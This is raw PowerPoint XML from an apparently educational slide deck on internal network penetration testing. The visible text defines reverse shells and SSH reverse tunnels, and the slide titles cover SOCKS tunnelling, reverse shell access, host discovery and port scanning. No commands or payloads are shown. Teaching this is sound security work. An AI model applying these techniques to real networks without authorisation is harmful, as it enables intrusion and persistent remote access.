              <a:t>IP address of SOCKS Connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199203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640AA-D9F8-4B8B-A432-31A7E0CB3AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SSH Reverse Shells</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7691A47-06F9-449F-AB5D-938A7406FEAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A reverse connection which originates from the destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A reverse shell is a network socket which contains shell access to your target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A reverse shell can be established in many ways to ensure it’s secure and our method is reliable; we can use SSH to give us a reverse shell via reverse tunnel. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Reverse SSH tunnel and reverse shell are completely separate processes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306150462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338</TotalTime>
  <Words>1119</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>111</Paragraphs>
  <Slides>19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Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Facet</vt:lpstr>
      <vt:lpstr>Introduction to Internal Network Penetration Testing - Offensive Security Tactics for Linux Professionals</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Internal Network Penetration Testing Methodology</vt:lpstr>
      <vt:lpstr>Purpose and Context of Internal Network Penetration Testing</vt:lpstr>
      <vt:lpstr>Key Considerations Against Secure Networks</vt:lpstr>
      <vt:lpstr>Establish SOCKS Tunnel  - Connecting To The Internal Network</vt:lpstr>
      <vt:lpstr>Diagram of SSH SOCKS Proxy</vt:lpstr>
      <vt:lpstr>Configuring SOCKS on Firefox</vt:lpstr>
      <vt:lpstr>SSH Reverse Shells</vt:lpstr>
      <vt:lpstr>Adding SSH Reverse Shell Access</vt:lpstr>
      <vt:lpstr>Defensive SSH Tactics</vt:lpstr>
      <vt:lpstr>SSH Reverse Shell in Action</vt:lpstr>
      <vt:lpstr>SSH Reverse Shells for WAN (Wide Area Networks)</vt:lpstr>
      <vt:lpstr>Host Discovery</vt:lpstr>
      <vt:lpstr>How to port scan internally?</vt:lpstr>
      <vt:lpstr>Port scanning: Method 1</vt:lpstr>
      <vt:lpstr>Port scanning: Method 2</vt:lpstr>
      <vt:lpstr>I’ve done my recon. What do I do now?</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Network Port Scanning &amp; Recon Tactics</dc:title>
  <dc:creator>Aqeeb Hussain</dc:creator>
  <cp:lastModifiedBy>Aqeeb Hussain</cp:lastModifiedBy>
  <cp:revision>855</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-03T15:50:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-05T15:12:48Z</dcterms:modified>
</cp:coreProperties>
</file>